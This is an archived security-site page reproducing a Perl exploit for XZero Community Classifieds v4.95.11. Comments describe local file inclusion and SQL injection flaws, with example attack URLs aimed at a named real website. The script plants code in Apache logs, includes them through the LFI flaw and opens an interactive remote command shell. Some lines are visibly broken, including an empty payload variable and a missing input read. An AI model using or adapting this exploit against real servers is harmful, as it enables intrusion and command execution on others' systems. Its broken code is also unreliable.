Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: e-commerce, shopping carts :: bx1204.htm

XZero Community Classifieds <= v4.95.11 LFI & SQL Injection



XZero Community Classifieds <= v4.95.11 LFI & SQL Injection
XZero Community Classifieds <= v4.95.11 LFI & SQL Injection



#!/usr/bin/perl=0D
#=0D
# XZero Community Classifieds  <= v4.95.11 LFI & SQL Injection=0D
# linK : http://www.xzeroscripts.com=0D 
# download: http://rapidshare.com/files/66809648/XZCl4.95.11.rar=0D 
# http://en.rstzone.org/xzero-community-classifieds-v4-95-11-lfi-sql-in-t9394.rst=0D 
# (c)od3d and f0unded by Kw3rLn from Romanian Security Team a.K.A http://rstzone.org=0D 
#=0D
# Local file inclusion in index.php:=0D
#=0D
#  switch($xview)=0D
#      {=0D
#                      [ ..... ]=0D
#         case "page"         : $page = "$_GET[pagename].php";   break;=0D
#             [ ..... ]=0D
#      }=0D
#=0D
#  include_once($page);=0D
# in common.inc.php line 40: $xview = $_GET['view'] ? $_GET['view'] : "main";=0D
#=0D
# SQL Injection in post.php=0D
# line 511: $sql = "SELECT expireafter FROM $t_subcats WHERE subcatid = $_REQUEST[subcatid]";=0D
# ( And more but useless cuz admin password is in config.inc.php)=0D
#=0D
# LFI: http://site.com/index.php?view=page&pagename=[Local_FIle]%00=0D 
# Example: http://www.diasporaromana.com/index.php?view=page&pagename=tetete=0D 
#=0D
# SQL: http://site.com/index.php?view=post&cityid=2&lang=en&catid=2&subcatid=[SQL]=0D 
# Example: http://www.diasporaromana.com/index.php?view=post&cityid=220&lang=en&catid=5&subcatid=18'=0D 
#=0D
# And now exploit for LFI=0D
=0D
use IO::Socket;=0D
use LWP::Simple;=0D
=0D
=0D
@apache=(=0D
"../../../../../var/log/httpd/access_log",=0D
"../../../../../var/log/httpd/error_log",=0D
"../apache/logs/error.log",=0D
"../apache/logs/access.log",=0D
"../../apache/logs/error.log",=0D
"../../apache/logs/access.log",=0D
"../../../apache/logs/error.log",=0D
"../../../apache/logs/access.log",=0D
"../../../../apache/logs/error.log",=0D
"../../../../apache/logs/access.log",=0D
"../../../../../apache/logs/error.log",=0D
"../../../../../apache/logs/access.log",=0D
"../logs/error.log",=0D
"../logs/access.log",=0D
"../../logs/error.log",=0D
"../../logs/access.log",=0D
"../../../logs/error.log",=0D
"../../../logs/access.log",=0D
"../../../../logs/error.log",=0D
"../../../../logs/access.log",=0D
"../../../../../logs/error.log",=0D
"../../../../../logs/access.log",=0D
"../../../../../etc/httpd/logs/access_log",=0D
"../../../../../etc/httpd/logs/access.log",=0D
"../../../../../etc/httpd/logs/error_log",=0D
"../../../../../etc/httpd/logs/error.log",=0D
"../../.. /../../var/www/logs/access_log",=0D
"../../../../../var/www/logs/access.log",=0D
"../../../../../usr/local/apache/logs/access_log",=0D
"../../../../../usr/local/apache/logs/access.log",=0D
"../../../../../var/log/apache/access_log",=0D
"../../../../../var/log/apache/access.log",=0D
"../../../../../var/log/access_log",=0D
"../../../../../var/www/logs/error_log",=0D
"../../../../../var/www/logs/error.log",=0D
"../../../../../usr/local/apache/logs/error_log",=0D
"../../../../../usr/local/apache/logs/error.log",=0D
"../../../../../var/log/apache/error_log",=0D
"../../../../../var/log/apache/error.log",=0D
"../../../../../var/log/access_log",=0D
"../../../../../var/log/error_log"=0D
);=0D
=0D
print "[RST] XZero Community Classifieds <= v4.95.11 Remote Command Execution Exploit\n";=0D
print "[RST] need magic_quotes_gpc = off\n";=0D
print "[RST] c0ded by Kw3rLN from Romanian Security Team [ http://rstzone.org ] \n\n";=0D 
=0D
=0D
if (@ARGV < 3)=0D
{=0D
    print "[RST] Usage: xzero.pl [host] [path] [apache_path]\n\n";=0D
    print "[RST] Apache Path: \n";=0D
    $i = 0;=0D
    while($apache[$i])=0D
    { print "[$i] $apache[$i]\n";$i++;}=0D
    exit();=0D
}=0D
=0D
$host=$ARGV[0];=0D
$path=$ARGV[1];=0D
$apachepath=$ARGV[2];=0D
=0D
print "[RST] Injecting some code in log files...\n";=0D
$CODE="";=0D
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n";=0D
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";=0D
print $socket "User-Agent: ".$CODE."\r\n";=0D
print $socket "Host: ".$host."\r\n";=0D
print $socket "Connection: close\r\n\r\n";=0D
close($socket);=0D
print "[RST] Shell!! write q to exit !\n";=0D
print "[RST] IF not working try another apache path\n\n";=0D
=0D
print "[shell] ";$cmd = ;=0D
=0D
while($cmd !~ "q") {=0D
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n";=0D
=0D
    print $socket "GET ".$path."index.php?view=page&pagename=".$apache[$apachepath]."%00&cmd=$cmd HTTP/1.1\r\n";=0D
    print $socket "Host: ".$host."\r\n";=0D
    print $socket "Accept: */*\r\n";=0D
    print $socket "Connection: close\r\n\n";=0D
=0D
    while ($raspuns = <$socket>)=0D
    {=0D
        print $raspuns;=0D
    }=0D
=0D
    print "[shell] ";=0D
    $cmd = ;=0D
} 


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH